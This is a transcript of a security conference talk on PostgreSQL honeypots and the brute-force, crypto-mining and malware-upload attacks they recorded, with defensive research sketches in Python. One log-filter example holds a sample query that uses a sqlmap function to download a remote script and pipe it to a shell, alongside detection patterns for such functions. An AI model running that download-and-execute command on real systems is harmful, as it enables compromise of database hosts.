
BSidesSF 2018 - PostgreSQL Threats and Attacks in the Wild (AJ Bahnken • Forrest Fleming)

BSidesSF · 2018 · 21:52 · 111 views · Published 2018-04
Category: Technical
Style: Talk
About this talk
AJ Bahnken • Forrest Fleming - PostgreSQL Threats and Attacks in the Wild. We developed two PostgreSQL honeypots, pghoney (low-interaction) and Sticky Elephant (medium-interaction). This talk presents our findings (exploits! malware! brute force!) to the security community. We will also discuss the development of our honeypots and their integration into MHN & HPFeeds.

[Music]

Hey everyone. So yeah, this is PostgreSQL Threats and Attacks in the Wild. Quick intros: hi, I am AJ Bahnken, I'm a security engineer at Mozilla. I'm Forrest Fleming, and I'm a senior security engineer at Procore Technologies. Today we're going to be talking about two honeypots that AJ and I wrote to emulate PostgreSQL. We deployed them to a few different servers around the nation, really, and this talk is to present our findings from those deployments. Just a quick note: these were research deployments, not alert deployments. We were using them to gather threat intelligence about attacks that are happening in the wild, as opposed to putting them in a network

to see if there's a rogue actor trying to hit our honeypot and then alerting on that. Yeah, and before we get started, just a quick introduction to honeypots in case anyone in the audience isn't familiar. Generally, a honeypot is a purposely vulnerable system, made purposely vulnerable so that it can attract attackers, either for threat research, as we're doing, or, as Forrest was mentioning, for something like your internal network, to notify you if there are attackers, et cetera. In the context we're going to be talking about, a purposely vulnerable networked service, there are three main types: low

interaction, medium interaction, and high interaction. Low and medium are fairly similar in that they are a separate piece of software made to mimic something. In this context it will be a Postgres server, but it's not actually a Postgres server, just made to look like one, and we'll get into the differences between low and medium in a second. High interaction is typically actually running a purposely vulnerable version of Postgres, sandboxed in whatever way you want to do that. We put these slides up on Sched, and there's a link at the end of the slides, but if you're at all interested in learning more about honeypots, I highly recommend the book Virtual Honeypots, and the Honeynet

Project is an awesome project with tons and tons of awesome resources on their website. And then awesome-honeypots just has a huge link dump, tons of cool open-source honeypots and related software. So the honeypot that I wrote is called Sticky Elephant, and it was inspired by Kippo and Cowrie. If you're not familiar with them, Cowrie is a fork of Kippo, and both are essentially Python packages, Python scripts, that work to emulate an SSH daemon and give you a bash prompt when you log in. They go pretty far toward actually deceiving the person that logs in. They have a lot of really cool functionality that makes

it look, at least for the first few minutes, like you're really on an actual bash terminal and not inside a Python program. Doing that emulation is what's known as being medium interaction: it's not the high interaction where you have an actual thing, and it's not quite the low interaction that we'll talk about in a minute, but it's doing some semblance of the real thing. Sticky Elephant is not as advanced as the Kippo and Cowrie projects are. Mostly it lets you log in, gives you a psql prompt, and for pretty much anything that you throw at it, it's going to give you back the same query results; they're just hard-coded into the application.
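The hard-coded-response idea can be sketched in a few lines. This is only an illustration in Python, not Sticky Elephant's actual code (which is written in Ruby); the class name `CannedResponder`, the column name, and the row contents are all hypothetical.

```python
from dataclasses import dataclass, field
from typing import List, Tuple

# Hypothetical canned result: one column and one row, returned for every query.
CANNED_COLUMNS = ("result",)
CANNED_ROWS = [("ok",)]


@dataclass
class CannedResponder:
    """Logs every query and answers all of them with the same fixed rows."""

    log: List[Tuple[str, str]] = field(default_factory=list)

    def handle_query(self, client_ip: str, query: str):
        # Record what the client tried to run; the log is the research value.
        self.log.append((client_ip, query))
        # Never return an error, so automated scripts keep going.
        return CANNED_COLUMNS, CANNED_ROWS
```

A human at the keyboard would notice that `SELECT version()` and `DROP TABLE users` produce the same output, but a script that only checks for errors would not.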

This lets us sort of fool automated attackers, even though it wouldn't fool an actual human on the keyboard. They don't get any errors from their scripts, nothing's going wrong from an automated standpoint, so we get to see what sort of things are being run when they log in. I wrote this in Ruby; you can see the GitHub org, betheroot, has our stuff. I deployed this on just a Cox cable home internet connection and in AWS. And then pghoney, which is the one I wrote: it's inspired by Elastichoney, and Elastichoney is a small Elasticsearch honeypot that just has static, hard-coded responses to some of the common Elasticsearch API

calls. It's not quite that; instead it just mimics the Postgres authentication flow. How it works is, as an operator, when you deploy pghoney you define a list of usernames that quote-unquote exist. The Postgres authentication flow is that you tell Postgres, hey, I want to log in with this username to this database, and some other stuff. If that username exists, it'll say, okay, give me the password, if there's a password required or whatever. So this does the same thing: when you say I want to log in with this username, if the username's in the config file, then it will ask for the password; otherwise it'll just say, you

know, that username does not exist. It's written in Go; you can find the code there, and we'll have links to the GitHub org at the end as well. It's deployed in DigitalOcean and AWS. Before we get started with the actual findings, we do want to throw some shout-outs to the PostgreSQL documentation crew. Their docs are amazing, both for actually implementing the auth flow, which AJ and I both did in separate languages, and for just having tons of information about the wire protocol. Once you get over the pretty shallow initial learning curve of navigating the docs, there is so much information, and it's so easy to begin to

hack in support for a new type of query. I also want to shout out Jan Urbański, who gave a PGCon talk called Postgres on the Wire; the slides were tremendously helpful for both AJ and me. And I wanted to note that when we initially wrote these honeypots, we were planning on deploying them as part of the MHN, Modern Honey Network, project. As time went on, we decided the operational overhead of running an MHN instance, the full-bore thing, was really more than we wanted to do for something that was supposed to be: you set up a collector, you wait several months, maybe check on it in the

interim, but without needing a lot of operator interaction. So there is HPFeeds integration, which is what MHN uses for its logging. You can feel free to connect them to MHN on your own; we have some PRs into the MHN project that we'll be opening up fairly soon for that, but it's not what we actually used for our collection suite. So let's get into the exciting part, the findings. First off, we wanted to start with some high-level demographics about what we saw. This is the number of unique IPs by country, and it's fairly typical: US boxes are at the very top, and right below is China, which makes sense. And

then as well, the top 10 ASNs by unique IP. LeaseWeb Netherlands is at the top; they have boxes all throughout the European Union, so it's right that the Netherlands wasn't towards the top of the country list, since those boxes are spread throughout the EU. We'll be talking about some of these specific hosting providers, but these were the locations of actual attackers that we got. So the first attacks are brute-force attacks. That's pretty much exclusively what I got with pghoney. The dream goal of it was to hopefully capture some interesting attack on the authentication flow for Postgres. I didn't get anything like that; instead the most interesting stuff I got was brute forcing, and, you

know, almost all the brute-forcing traffic was from China, France, or Turkey. Something interesting that I wanted to mention was that for all of the Chinese IPs that were doing brute forcing, I would see scanning traffic from the exact same Class C about one to two days before something on that same Class C would actually do a brute force. As well, as you'd expect, around 95% of the passwords were either found in SecLists or were very obviously dictionary-based, like common transformations on the word password or administrator. We will be opening a PR into SecLists for the around 200 passwords not found, to see if it's something that

they find potentially useful or interesting. As part of those 200 passwords that were not in SecLists or obviously dictionary-based, something that was interesting was running all these passwords through a complexity score, zero being the least complex and four being the most. Of the around 200 or so passwords, most of them scored three or four. Most of them were Chinese words and some were not, but I found that fairly interesting. As well, something to mention in regards to pghoney around the brute-forcing stuff: to make it much easier to analyze the actual passwords coming in, Postgres has a way to say, hey, give me the password

from the client in cleartext, rather than MD5, which is the most common. So it is a very easy way to fingerprint pghoney at the moment: if the server's asking for the password in cleartext, that's not a very common thing. So, behavior on logon. If we just record the login flow and the auth, we get a lot of really cool information about brute-force attacks, as AJ was talking about. What if we let them actually have a psql prompt and start running queries? What we get are a lot of robots. We actually saw zero manual interaction in our pghoney and Sticky Elephant deploys, and a lot of bot

traffic. We did see a malware upload that we'll talk about in a little bit, but before that I want to talk about this group of individuals that really, really, really wanted to mine Monero using our compute resources. This is pretty cool because we got to watch the evolution of a particular attack group over the course of about nine months. As you can see here, they start out doing pretty basic, bog-standard stuff. It's just a call to sys_eval999, a user-defined function dropped by sqlmap, so super script-kiddie. They're relying on a previously exploited box just hanging out on the internet, and they're trying to log in, use that function that was part of the

exploit, and download a stage two. They grab the stage two, and what that is is just a shell archive that doesn't do much that's interesting. It kills a bunch of other Monero miners that could potentially be on the box, then it installs its own Monero miner, and we're off to the races. It's kind of interesting that they run the miner as /tmp/sshd, so they are trying to pretend to be an SSH daemon, but it's not a particularly well-thought-out or deeply deceitful obfuscation attempt. We saw these attacks start on March 3rd of last year and stay doing basically the exact same thing, with different IPs, up until April 11.
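For anyone triaging similar honeypot logs, the pattern described here (a call to a sqlmap-style user-defined function that fetches a stage-two script) can be picked out with a small filter. The following is a minimal Python sketch under stated assumptions: the function-name patterns, the helper name `stage_two_urls`, and the sample query are illustrative and are not taken from the speakers' logs or tooling.

```python
import re
from typing import List

# Illustrative patterns only: names of sqlmap-style UDFs worth flagging.
SUSPICIOUS_UDF = re.compile(r"\b(sys_eval\w*|sys_exec\w*)\s*\(", re.IGNORECASE)
# A URL runs until whitespace, a quote, a pipe, a semicolon, or a closing paren.
URL = re.compile(r"https?://[^\s'\"|;)]+")


def stage_two_urls(query: str) -> List[str]:
    """Return URLs found in a query that calls a suspicious UDF."""
    if not SUSPICIOUS_UDF.search(query):
        return []  # ordinary query, nothing to report
    return URL.findall(query)


# Hypothetical logged query; 203.0.113.5 is a documentation-only address.
sample = "SELECT sys_eval('curl -s http://203.0.113.5/stage2.sh | sh')"
print(stage_two_urls(sample))
```

Collecting the extracted URLs per day is one way to follow a distribution server or script name as it changes over time.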

Second verse, same as the first; a little bit different, not that much worse. Actually, it's almost the exact same thing: sys_sun instead of sys_eval999, but it's the same sort of thing, a sqlmap user-defined function exploit that drops it in there, a default sort of thing, and they're still relying on the previously exploited machine. We saw this starting on April 15th. The attack servers start coming from Wholesale Internet, where they were almost exclusively coming from Linode before. The distribution servers are still pretty much exclusively on Linode. You'll notice a little bit of sophistication, in that the attacker is now grabbing different scripts; that's a different stage two up there. But it's really nice for us,

trying to connect the dots of these attackers, to make sure they really are the same person or the same group and not just somebody that bought the script from somewhere. Luckily, when they switch the stage-two script name, they do it on the same distribution server, and then they'll switch distribution servers using the new script a little bit later. They just keep doing that, and we have a really nice clear path through the logs saying, hey, these are the same folks. When we do cut from sys_eval to sys_sun, we start grabbing inpool.sh from the same distro servers. April 17th, we start grabbing pgpool.sh,

and we do that for a while. good.sh happens on May 3rd, but still with the same sort of clear chain going on. Then we do a cut from good.sh to something a little more advanced: fr.sh, eu.sh, usa.sh. And you're like, oh wow, they're doing geographic fingerprinting, this is the next step. No. They weren't actually doing any checking on anything; they were grabbing all three of those scripts and running them in sequence. Your guess is probably as good as mine. That started on May 7th, and around that time they started doing a drop function on the system function. I think that's probably to prevent themselves from

reinfecting the same machine, wasting resources on owning the same machine over and over and over. It could also be evidence of other threats out there that might want to take over the same territory. At the end of the month of May they get a little bit, I don't know if more sophisticated is the right phrase, more brazen: they register postgres.tk and start using that instead of raw IPs for their distribution servers. I imagine they hadn't seen too much resistance. AJ and I shut down a few attack servers and a few distro servers, just emailing Linode and being like, hey, got some stuff going on here, and they came up

again within 24 to 48 hours from a different IP, so we stopped playing whack-a-mole there. They really stay on postgres.tk, doing the same sort of thing, until the next big move. And the next big move is this: we start seeing, concurrently with the sys_sun attacks, some scanning traffic coming from Chinese telecoms. The user logs in, they check the pg_largeobject store, they check the version of the database, and they attempt to drop a particular object ID out of the large object store. It's not a lot of different IDs at once; we'd see one ID for a week or two, another ID for a week or two, and at the end they settled on one ID that

lasted for quite some time. This continues all the way from basically May until August 4th, which is when the sys_sun attacks completely halt. About three weeks after that we start seeing this guy, which is the same sort of thing: it's a user-defined function that's being used to run shell code, shell code in the sense of bash scripts, not in the other sense. It's doing the same sort of thing, but we never actually saw this function being created. And note the file name there: it's s and some digits. Those digits are the large object ID that was being dropped in the previous scanning traffic that we had been seeing for some time. This

would be pretty mysterious if it weren't for the folks at Imperva, who did some really great research and were tracking these folks concurrently with us. The Monero address that you see there is the same one that this write-up, which they published in March of this year, was finding. They filled in a lot of the blind spots that we had when it comes to the actual exploitation of the machine, that is, putting the fun 8 100 170 function onto the machine, and how they were distributing it. In this stage of the operation, it was actually a picture of Scarlett Johansson that was put on a public image host, and then the x binary

was pulled out of that. You run the x binary, that drops the s binary, the s binary is actually the miner, and that gets run to do crypto stuff. I really encourage you all to read this, and hats off to these folks for being able to provide the final piece, the most advanced phase for this crew that we were tracking for almost a year. Really great work. So we have the sys_eval and the sys_sun crew, and they were pretty well connected; we know that they're the same crew, both using postgres.tk at the end, so that's pretty obvious. And there's the function call crew. There's a little bit of geographic

shifting: instead of Linode servers out of the US, almost all of the attack traffic was coming from China. Can we really say that those two attacks are coming from the same group? I think we can. First of all is the fact that there was no exploit kit or distribution contact for what I'm calling the function call folks, the fun 8 101 70 guys. That's sort of interesting, because it tells me that they were probably relying on some sort of previous exploitation; they were relying on that function having been created at some point in a previous process. And what was that? Well,

they knew that we were quote-unquote vulnerable from the sys_sun and the sys_eval phases. Also, look at the timestamps of the attacks: there's no overlap whatsoever between the sys_sun call and the fun 8 101 70 call. There's about three weeks where neither of those is happening. If it were two separate groups, I would expect there to be some overlap, some evidence that they're trying to take over the same machine, some kind of struggle going on there. We didn't see that whatsoever. And third is just a similarity of tools: they were both using yam, Yet Another Miner, with the same arguments, and they're using the same crypto mining pool at crypto-pool.fr. Of course,

none of that is conclusive; this is circumstantial evidence that they're the same. But we do think the preponderance of evidence points to them being the same group, and since this is us trying to connect the dots of a, to my mind, fairly interesting attack group, and not a court of law, I'm pretty comfortable saying these are the same folks. I mentioned malware storage. You might be thinking, oh yes, they were putting something in pg_largeobject. This was the single call we got to the pg_largeobject store to land something, and it would make tons of sense if this were a Monero miner. It wasn't. It was a Windows RAT, it came from a Brazilian IP, and it was the only

Brazilian traffic we got. So while it could conceptually be part of that campaign, it seems really unlikely to us; we're pretty sure it was just a one-off. It was really exciting when the base64 came through, and we were like, oh, let's open that up, see what it is, but it wasn't anything particularly groundbreaking. So before we conclude, we wanted to have a quick slide on defense tips from doing this work. The top part is, in some senses, funny, but I think it's still probably important to mention nonetheless: don't expose your Postgres server to the

Internet, use good passwords, and don't run Postgres as root. If you're installing Postgres from almost any package manager, it'll set up a postgres user and do all that for you. From all the awesome stuff that Forrest was just talking about, restricting creation of user-defined functions is a good idea. If you can get away with completely removing that functionality from your Postgres users, that's awesome; otherwise, a common thing I've seen is the separation of a Postgres user that your app actually uses from one that can do migrations and can create those user-defined functions. Also, it's important, I think, to remember that Postgres usernames are enumerable. And if you want to learn more about kind

of the blue team side of Postgres, we link to this slide deck from Christophe Pettus at PGExperts, who did an awesome talk on securing Postgres, a big, in-depth look at Postgres as well as at the host running your Postgres server. So to conclude, what's next for this? I guess there's really just two pieces. The first one is, we started to talk a little bit about fingerprinting concerns, and there's some cool stuff that we could do, and are interested in doing, around further fingerprint mitigation. If you look at Kippo and Cowrie, some more advanced, or more worked-on, honeypots, they have tons and tons of

stuff to deal with this issue. And as well, information sharing: we're not going to commit to releasing some big public disclosure of all the logs or anything, but if you're at all interested in talking to us about this, or getting some of the logs or any of that stuff, please come and talk to us or email us or anything. I promise we're very nice. Yeah, that's pretty much it. Thank you, guys. Thanks all, we're honored to be here. I don't know if we have time for questions. I think... oh, what's up, Sam? So to repeat the question: the question, as I understand it, was, did I see any drop-off from somebody who

got the response and said, no, I don't want to give you a password in cleartext? Yeah, I did not. What I saw mostly was either full brute forces, where there were hundreds and hundreds of attempts, or five to eight attempts, and I don't know what to make of that; they just tried a couple of passwords and a couple of usernames and then moved on. So I haven't seen that yet, but I imagine we will, especially now that these are open source, because they weren't originally. Yeah, they'll probably be fingerprinted immediately. Thank you all so much. [Applause]
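The cleartext-password fingerprint raised in that question comes down to a single field in the server's authentication request. Below is a minimal Python sketch of the relevant PostgreSQL wire-protocol messages, assuming protocol version 3.0 message layouts; the function names are hypothetical, and this is not pghoney's code (which is written in Go).

```python
import struct

AUTH_CLEARTEXT = 3  # AuthenticationCleartextPassword
AUTH_MD5 = 5        # AuthenticationMD5Password


def auth_cleartext_request() -> bytes:
    # 'R', then an Int32 length (which counts itself), then the auth type.
    return b"R" + struct.pack("!II", 8, AUTH_CLEARTEXT)


def auth_md5_request(salt: bytes) -> bytes:
    if len(salt) != 4:
        raise ValueError("MD5 salt must be exactly 4 bytes")
    return b"R" + struct.pack("!II", 12, AUTH_MD5) + salt


def asks_for_cleartext(message: bytes) -> bool:
    """Client-side check: did the server request a cleartext password?"""
    tag, _length, auth_type = struct.unpack("!cII", message[:9])
    return tag == b"R" and auth_type == AUTH_CLEARTEXT


def parse_password_message(data: bytes) -> str:
    """Extract the password from a client PasswordMessage ('p')."""
    if data[:1] != b"p":
        raise ValueError("not a PasswordMessage")
    (length,) = struct.unpack("!I", data[1:5])
    body = data[5:1 + length]  # the length excludes the 1-byte type tag
    return body.rstrip(b"\x00").decode("utf-8", errors="replace")
```

A scanner that calls something like `asks_for_cleartext` on the first server reply could flag the host as unusual, which is the fingerprinting concern mentioned in the talk; answering with an MD5 request instead would hide that tell, at the cost of no longer receiving plain passwords.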